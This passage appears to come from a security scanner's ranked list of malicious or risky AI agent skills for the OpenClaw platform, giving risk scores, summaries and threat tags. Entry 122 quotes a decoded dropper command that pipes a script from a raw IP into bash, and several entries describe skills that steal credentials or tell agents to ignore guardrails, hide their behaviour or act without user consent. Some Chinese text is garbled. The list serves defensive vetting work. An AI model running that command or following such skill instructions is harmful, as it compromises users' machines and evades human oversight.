ๅฃฐ็งฐๆฏไธไธชๅฐไบ้ฉฌ้ๅๅๆฐๆฎๅๆญฅๅฐShopify็้็จๅผๆ๏ผไฝๅฎ้ ไปฃ็ ๆฏ้ๅฏน็นๅฎๅๅ(ASIN B0FHPZRLJK)็็กฌ็ผ็ ่ๆฌ๏ผๅ ๅซๆๆAPIๅฏ้ฅ๏ผไธๆ ธๅฟๅๆญฅ้ป่พๆ ๆณๆญฃๅธธ่ฟ่กใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
121. ๐จ feishu-group-ops by vinzeny
| Risk: 80% โโโโโโโโโโ | Downloads: 169 |
A Feishu (Lark) group management skill for the OpenClaw platform that allows natural language management of group chats (add/remove members, list groups, send messages, rename/create groups) via a Python CLI script, with per-write-operation billing tโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
122. ๐จ OmniCog by unknown
| Risk: 100% โโโโโโโโโโ | Downloads: 0 |
This is not a legitimate skill. It is a malware dropper disguised as a package manager installer. The README contains a base64-encoded command that decodes to:
/bin/bash -c "$(curl -fsSL http://91.92.242.30/ozv614w31u0f80wy)"โ which silently fetchโฆ
Threats detected:
[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
123. ๐จ OpenClaw Shield by unknown
| Risk: 96% โโโโโโโโโโ | Downloads: 0 |
Claims to be an enterprise security scanner for AI agents, but actually instructs Claude to clone and execute an unreviewed external GitHub repository, while using preemptive social engineering (SECURITY.md) to suppress security concerns.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
124. ๐จ Reddit VOC Lobster Pro by unknown
| Risk: 94% โโโโโโโโโโ | Downloads: 0 |
่ฏฅ skill ๅฃฐ็งฐๆฏไธไธช Reddit ๆถ่ดน่ ่ฐ็ ๅผๆ๏ผ่ฝ่ชๅจๆๅ Reddit ๆฐๆฎใๅๆญฅ่ณ้ฃไนฆๅค็ปด่กจ๏ผๅนถๅฐๆฅๅๅๅธ่ณ Cloudflare Pagesใไฝๅฎ้ ไปฃ็ ไธญ็ๆฐๆฎๆๅๅ้ฃไนฆๅๅ ฅๅไธบไผช้ ๆไฝ๏ผไธๅ ๅซ็กฌ็ผ็ ็็ๅฎ API ๅญ่ฏใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
125. ๐จ Agentpay by unknown
| Risk: 92% โโโโโโโโโโ | Downloads: 0 |
A skill that instructs Claude to propose and execute real online purchases on behalf of users by installing an npm package (โagentpayโ) that stores encrypted payment credentials and uses a headless browser to complete checkouts autonomously.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
126. ๐จ Agentok Skill by unknown
| Risk: 92% โโโโโโโโโโ | Downloads: 0 |
่ฏฅๆ่ฝๅฃฐ็งฐไธบAIไปฃ็ๆไพไธไธชๅไธบAgentTok็TikTokๅผ่ง้ขๅไบซๅนณๅฐ๏ผ่ชๅจๆณจๅ่ดฆๅทใ็ๆไป็ป่ง้ขๅนถไธไผ ใๅฎ้ ไธ๏ผ่ๆฌๅฐๅญ่ฏๅๆฐๆฎๅ้่ณๆปๅป่ ๆงๅถ็Cloudflareไธดๆถ้ง้๏ผ้ๅฎๆนๅๅ๏ผ๏ผๅนถๅจๆฌๅฐไปฅๆๆๅฝขๅผไฟๅญๆๆๅญ่ฏ๏ผๆๆๅญ่ฏ็ชๅๅๆฐๆฎๆธๆผๆปๅปใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
127. ๐จ Walletconnect Agent by unknown
| Risk: 91% โโโโโโโโโโ | Downloads: 0 |
A Node.js skill that connects an AI agent to Web3 dApps via WalletConnect v2, auto-signing cryptocurrency transactions (swaps, mints, DAO votes, domain registrations) without human confirmation, optionally combined with Puppeteer browser automation fโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
128. ๐จ self-evolve by be1human
| Risk: 90% โโโโโโโโโโ | Downloads: 0 |
Instructs an AI agent to autonomously modify its own configuration, skills, and workspace files without user confirmation, and to ignore safety guardrails by reframing them as unnecessary obstacles.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
129. ๐จ Rent a Person by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 0 |
An OpenClaw agent skill that processes RentAPerson platform webhooks (message.received, application.received, work_evidence.submitted) and responds via the RentAPerson REST API, supporting a two-session architecture with a bridge service for API key โฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[HIGH]Systemd Service Installation[CRITICAL]LLM Semantic Detection
130. ๐จ KTrendz Lightstick Trading by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 0 |
A Claude Code skill that enables AI agents to autonomously execute financial trades (buy/sell) of K-pop artist โlightstick tokensโ on a third-party bonding curve market at k-trendz.com, using real USDC cryptocurrency.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
131. ๐จ Top ClawHub Skills by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 0 |
Instructs Claude to fetch data from a third-party API at topclawhubskills.com and present rankings, search results, and โsecurity certificationโ status for ClawHub skills, effectively acting as a recommendation engine for skill installation.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
132. ๐จ xurl by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 0 |
A proposed skill for analyzing Twitter content to identify and target WordPress and Shopify clients for lead generation and content intelligence purposes.
Threats detected:
[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
133. ๐จ Anti-Injection-Skill by unknown
| Risk: 87% โโโโโโโโโโ | Downloads: 0 |
Marketing and publishing documentation for a proposed โSecurity Sentinelโ prompt injection defense skill, presented as a complete, functional, production-ready system with zero actual implementation code provided.
Threats detected:
[HIGH]SSH Key Access[HIGH]Base64 Encoded Payload[HIGH]Outbound Data Transfer[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection
134. ๐จ Subfeed by unknown
| Risk: 87% โโโโโโโโโโ | Downloads: 0 |
Instructs the AI agent to autonomously self-register on a third-party cloud service (Subfeed), create AI entities, and then onboard the human user by collecting their email and creating an account on their behalf โ all with minimal upfront user conseโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
135. ๐จ antigravity-image-gen by unknown
| Risk: 87% โโโโโโโโโโ | Downloads: 0 |
Claims to generate images using an internal Google Antigravity API (Gemini 3 Pro Image) by reading local OAuth credentials and making direct API calls to a sandbox endpoint.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
136. ๐จ Ambient Stamina by unknown
| Risk: 87% โโโโโโโโโโ | Downloads: 0 |
A philosophical/conceptual document that attempts to instruct Claude to adopt operational stances around pace, rest, and deliberate opacityโusing poetic metaphor and pseudo-technical jargon to encourage reduced behavioral legibility and resistance toโฆ
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
137. ๐จ Memory Mesh Core by unknown
| Risk: 87% โโโโโโโโโโ | Downloads: 0 |
A so-called โmemory managementโ skill that harvests local agent memory files, scores and promotes them, then exports and auto-posts the content to a public GitHub issue while embedding viral spread mechanics (install/star/recommend-to-peers CTAs) andโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
138. ๐จ EvoMap by unknown
| Risk: 87% โโโโโโโโโโ | Downloads: 0 |
This skill instructs Claude to act as an autonomous economic agent in the โEvoMapโ third-party marketplace: registering as a named node, sending system fingerprints to an external server, publishing AI-generated โGene+Capsuleโ bundles, claiming bountโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
139. ๐จ agentconnex-register by anshkohli88
| Risk: 85% โโโโโโโโโโ | Downloads: 0 |
Auto-registers โOpenClawโ agents on agentconnex.com by reading workspace files (SOUL.md, IDENTITY.md, AGENTS.md) and POSTing agent profile data to a third-party external service, with a zero-config auto-boot mechanism that installs itself to run on eโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
140. ๐จ 360-search by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 0 |
Automated web scraping client for the 360.com Chinese search engine, providing methods to search for web results, news, and images using Playwright browser automation
Threats detected:
[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
141. ๐จ Agent Nou by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 0 |
A documentation skill that instructs AI agents to register with and participate in โMoltbookโ, an external social network for AI agents, including storing API credentials, posting content autonomously, and executing periodically fetched remote instruโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
142. ๐จ GoalGetter by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 0 |
A task and goal tracking skill using local markdown files, designed for a fictional โOpenClawโ AI assistant platform, providing commands to add/complete tasks and track goal streaks.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
143. ๐จ EZCTO Smart Web Reader by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 0 |
An OpenClaw-native skill that automatically intercepts all agent URL accesses, checks a third-party cache API (api.ezcto.fun), fetches and parses HTML with an LLM, and returns structured JSON โ designed to operate โtransparentlyโ without user awareneโฆ
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
144. ๐จ Auto Skill Hunter by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 0 |
A Node.js automation script that mines user session JSONL files and task memory for unresolved problems, queries ClawHub APIs for candidate skills, scores them via multi-factor ranking, then clones and executes the top candidates โ effectively auto-eโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
145. ๐จ 9ma-mata-human by unknown
| Risk: 84% โโโโโโโโโโ | Downloads: 0 |
A skill designed to generate AI-synthesized human avatar videos lip-synced to user-provided text by downloading and executing platform-specific binary executables from a remote server
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
146. ๐จ ZenMux Image Generation by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 0 |
A Python CLI script that wraps the ZenMux (third-party proxy) API to generate images using a claimed โGemini 3 Proโ model, supporting text-to-image, image-to-image, and multi-image fusion workflows.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
147. ๐จ Tork Guardian by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 0 |
A third-party npm package (@torknetwork/guardian) that provides a security governance layer for โOpenClawโ agents, offering PII redaction, policy enforcement, shell command blocking, file access control, network security, and a skill vulnerability scโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]SSH Key Access[HIGH]Outbound Data Transfer[HIGH]Pastebin Upload[CRITICAL]LLM Semantic Detection
148. ๐จ Ai Lead Generator Skill by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 0 |
ๅฃฐ็งฐ้่ฟApollo.ioๅLinkedIn้ๆ็ๆ็ๅฎB2Bๆฝๅจๅฎขๆท๏ผไฝๅฎ้ ไธๅช็ๆๅฎๅ จ็กฌ็ผ็ ็ๅๆฐๆฎ๏ผๆฒกๆไปปไฝ็ๅฎAPI่ฐ็จๆๅค้จ้ๆใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
149. ๐จ wechat-mp-cn by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 0 |
Documentation and guidance for monitoring WeChat Official Accounts through third-party tools and manual methods, presented as if it were a functional skill
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
150. ๐จ X Search by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 0 |
Executes paid X/Twitter searches via a third-party npm package (@itzannetos/x402-tools-claude) using the x402 payment protocol, charging $0.05 USDC per query from the userโs Base network wallet.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
151. ๐จ 12306-conflict by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 0 |
A Playwright-based automation client for Chinaโs 12306 railway ticket booking website, providing login, ticket search, and (claimed but unimplemented) ticket purchasing functionality.
Threats detected:
[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
152. ๐จ AI media generation API - Flux2pro, Veo3.1, Suno Ai by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 0 |
A skill that enables Claude to generate images, videos, and music via a third-party API aggregator (vapagent.com), which claims to route requests to Flux, Veo, and Suno backends. Includes a free-tier funnel (3 images/day) and a paid full-tier with edโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
153. ๐จ ai-web-automation by arthasking123
| Risk: 80% โโโโโโโโโโ | Downloads: 0 |
Provides web scraping functionality via a simple Python script that downloads HTML and extracts basic metadata (page title and links). Claims to offer a comprehensive โWeb Automation Serviceโ with form filling, automated testing, scheduled tasks, andโฆ
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
154. ๐จ xiaoai-bridge by unknown
| Risk: 80% โโโโโโโโโโ | Downloads: 0 |
้่ฟ่ฝฎ่ฏขๅฐ็ฑณไบ็ซฏ API ็ๅฌๅฐ็ฑ้ณ็ฎฑ่ฏญ้ณๆถๆฏ๏ผ่ฟๆปค่งฆๅ่ฏๅไปฅ JSON ๆ ผๅผ่พๅบ๏ผๅนถๆฏๆ้่ฟ TTS ๅๅฐ็ฑ้ณ็ฎฑๆญๆฅๆๆฌ๏ผๅฎ็ฐ่ฏญ้ณๆไปคๆกฅๆฅๅ่ฝใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
155. ๐จ vibe-harvester by anotherj1
| Risk: 78% โโโโโโโโโโ | Downloads: 0 |
ไธไธชๆจๅจ่ชๅจๅๆต่ง็ๅธๆต็ฝ็ซ๏ผๅฆๅฐ็บขไนฆใPinterest๏ผใ้่ฟ่ง่งๅคงๆจกๅ็ญ้็ฌฆๅ็จๆทๅฎก็พๅๅฅฝ็ๅพ็๏ผๅนถ่ชๅจไธ่ฝฝไฟๅญๅฐๆฌๅฐ็ฎๅฝ็ๆ่ฝใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
156. ๐จ Arxiv Skill Learning by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 0 |
่ฏฅๆ่ฝไป arXiv ่ฎบๆไธญ่ชๅจๅญฆไน ๅนถๆๅๆ่ฝไปฃ็ ๏ผ้่ฟๆๅ่ฎบๆใ่ฐ็จๅค้จๆๅๅจ็ๆๆ่ฝใ่ฟ่กๅ็ๆต่ฏ๏ผๅนถๅฐๅทฒๅญฆไน ่ฎบๆ่ฎฐๅฝๅฐๆฌๅฐ JSON ๆฐๆฎๅบไปฅ้ฟๅ ้ๅคๅค็ใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
157. ๐จ ้คๅ ๆจ่ไบคๅ้ช่ฏ by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 0 |
A Claude Code skill that cross-references restaurant recommendations from Xiaohongshu and Dianping by scraping both platforms, matching restaurants with fuzzy logic, computing consistency scores, and outputting ranked recommendations โ with a โserverโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
158. ๐จ clawdeals by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 0 |
A docs-only skill bundle providing REST API documentation, workflows, policies, and operational runbooks for operating the Clawdeals marketplace platform (deals, watchlists, listings, offers, transactions).
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
159. ๐จ browser by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 0 |
Renders JavaScript-heavy web pages using Puppeteer and extracts their text content to overcome HTTP client limitations
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
160. ๐จ dygod-movies by anlinxi
| Risk: 78% โโโโโโโโโโ | Downloads: 0 |
็ฌๅ็ตๅฝฑๅคฉๅ (dygod.net)็็ตๅฝฑ/็ต่งๅงไฟกๆฏ๏ผๅฑ็คบๆๆฐๆดๆฐๅ้ซๅๅฝฑ่ง๏ผๅนถ้่ฟ็พคๆNAS็DownloadStationไธ่ฝฝ็ฃๅ/FTP้พๆฅ่ตๆบ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
161. ๐จ game-cog by nitishgargiitd
| Risk: 78% โโโโโโโโโโ | Downloads: 0 |
A documentation-only guide skill that instructs users to install and use an external โcellcogโ service for game asset generation (sprites, tilesets, music, GDDs, 3D models). Contains no executable implementation โ purely marketing copy and example prโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
162. ๐จ Protect PDF with password by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 0 |
Upload a userโs PDF file and a password to a third-party external API (api.xss-cross-service-solutions.com), poll until the job completes, then return a download URL for the password-protected PDF.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
163. ๐จ deploy-agent by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 0 |
A multi-step deployment workflow manager for full-stack apps targeting GitHub + Cloudflare Pages, with persistent state and human approval gates at each stage. The bash script manages deployment lifecycle via JSON state files.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
164. ๐จ DepGuard by unknown
| Risk: 76% โโโโโโโโโโ | Downloads: 0 |
A commercial dependency audit skill that wraps native package manager tools (npm audit, pip-audit, cargo audit, etc.) to scan for vulnerabilities and license issues. Free tier offers one-shot scanning; paid tiers ($19-$59/month) add git hooks, auto-fโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
165. ๐จ Dividend Premium Tracker by unknown
| Risk: 75% โโโโโโโโโโ | Downloads: 0 |
A Python-based tool that downloads dividend yield data for CSI Dividend Low Volatility Index (H30269) and 10-year China government bond yield, calculates the spread (premium), saves results to CSV/Excel, and sends Telegram alerts when thresholds are โฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]Cron Job Installation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
166. ๐จ claw and order by unknown
| Risk: 75% โโโโโโโโโโ | Downloads: 0 |
This skill enables AI agents to interact with a decentralized dispute resolution platform (โClaw & Orderโ) by filing lawsuits, checking active cases as a defendant, and submitting cryptographic defenses โ all involving real blockchain transactions anโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
167. ๐จ mintyouragent by unknown
| Risk: 74% โโโโโโโโโโ | Downloads: 0 |
A commercial CLI tool for autonomous AI agents to launch Solana tokens on pump.fun (costing 0.01 SOL platform fee per launch), play heads-up Texas Holdโem poker with real SOL stakes, and link agent identity/personality to mintyouragent.com. It is a sโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[HIGH]Outbound Data Transfer[CRITICAL]Cryptocurrency Wallet Access[CRITICAL]Private Key Extraction
168. ๐จ Planet Express Marketplace by unknown
| Risk: 74% โโโโโโโโโโ | Downloads: 0 |
This skill is documentation/API guide for a blockchain-based file marketplace (Planet Express) built on Monad, enabling users to buy/sell encrypted files via the x402 HTTP payment protocol using MON, SOL, or USDC, with fees partially routing to a $FAโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
169. ๐จ neural-memory by nhadaututtheky
| Risk: 72% โโโโโโโโโโ | Downloads: 0 |
A Claude Code plugin that provides persistent, associative memory for AI agents using a neural graph architecture with spreading activation recall. Includes an MCP server (45 tools), three lifecycle hooks (PreCompact/Stop/PostToolUse), and three workโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
170. ๐จ vdoob by unknown
| Risk: 72% โโโโโโโโโโ | Downloads: 0 |
่ฏฅๆ่ฝๅฐ Claude AI ๆฅๅ ฅ vdoob.com ๅนณๅฐ๏ผ่ฎฉ AI ไปฃ็่ชๅจๅ็ญ็จๆท้ฎ้ขไปฅ่ตๅ่ๆ่ดงๅธ๏ผโ้ฅตโ๏ผ๏ผๅ ๆฌๅฎๆถไปปๅก่ชๅจๆๅ้ฎ้ขๅนถๆไบค็ญๆกใๆฌๅฐๅญๅจๆ็ปดๆจกๅผใไปฅๅๅธๅบ/็คพไบค็ญ้ๅ ๅ่ฝใ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
171. ๐จ document-parser by ankylala
| Risk: 72% โโโโโโโโโโ | Downloads: 0 |
้่ฟ่ฐ็จๅค้จ็ฌฌไธๆน HTTP API๏ผๅบๅฎIP๏ผ47.111.146.164๏ผ่งฃๆ PDFใๅพ็ๅ Word ๆๆกฃ๏ผๆๅ็ปๆๅๆฐๆฎ๏ผไปฅๅฝไปค่กๅทฅๅ ทๅฝขๅผ่ฟ่กใ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
172. ๐จ github-to-clawhub by antonia-sz
| Risk: 71% โโโโโโโโโโ | Downloads: 0 |
ๅฐไปปๆ GitHub ๅผๆบ้กน็ฎ่ชๅจ่ฝฌๅไธบ OpenClaw skill ๅนถๅๅธๅฐ clawhub.com ็ 7 ๆญฅๆต็จๅฉๆ๏ผๆถต็ README ๆๅใๆฅ้ใSKILL.md ็ๆใๆฌๅฐ็ฎๅฝๅๅปบๅ clawhub CLI ๅๅธใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
173. ๐จ iCalendar Sync by unknown
| Risk: 71% โโโโโโโโโโ | Downloads: 0 |
A Python-based iCloud Calendar CRUD integration for OpenClaw agents, supporting CalDAV and macOS native bridge providers, with credential management via keyring, environment variables, or YAML config files.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
174. ๐จ jd-interview-prep by antonia-sz
| Risk: 66% โโโโโโโโโโ | Downloads: 0 |
ๆฅๆถ็จๆท็ฒ่ดดๆไธไผ ็ๅฒไฝๆ่ฟฐ๏ผJD๏ผๅไธชไบบ็ฎๅ๏ผ้่ฟ่ฐ็จ LLM API๏ผDeepSeek/OpenAI ๅ ผๅฎนๆฅๅฃ๏ผ็ๆๅน้ ๅบฆๅๆใ15 ้ๅ็ฑป้ข่ฏ้ข๏ผๅซ STAR ๆกๆถ๏ผๅๅค่ๅปบ่ฎฎ๏ผๅนถๅฏๅฐๆฅๅๅฏผๅบไธบ Markdown ๆไปถใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
175. ๐จ mcporter by unknown
| Risk: 63% โโโโโโโโโโ | Downloads: 0 |
Reference documentation for the mcporter CLI tool, which provides command-line access to list, configure, authenticate, and call MCP (Model Context Protocol) servers and their tools via HTTP or stdio interfaces.
Threats detected:
[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
176. ๐จ Tencent Cloud Lighthouse by unknown
| Risk: 63% โโโโโโโโโโ | Downloads: 0 |
้่ฟ mcporter + lighthouse-mcp-server ็ฎก็่ พ่ฎฏไบ่ฝป้ๅบ็จๆๅกๅจ๏ผๆไพ่ชๅจๅๅฎ่ฃ ้ ็ฝฎใๅฎไพ็ฎก็ใ็ๆงๅ่ญฆใ้ฒ็ซๅข็ฎก็ๅ่ฟ็จๅฝไปคๆง่กๅ่ฝ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
Most Common Threat Types
| Threat | Count |
|---|---|
| LLM Semantic Detection | 1561 |
| Dynamic Code Evaluation | 165 |
| Startup Failure (non-executable) | 151 |
| Outbound Data Transfer | 86 |
| Hidden Command Execution | 33 |
| Private Key Extraction | 23 |
| Environment Variable Exfiltration | 18 |
| Base64 Encoded Payload | 10 |
| SSH Key Access | 6 |
| Remote Script Execution | 6 |
ClawSec | ClawSearch | npx clawsearch-guard <skill>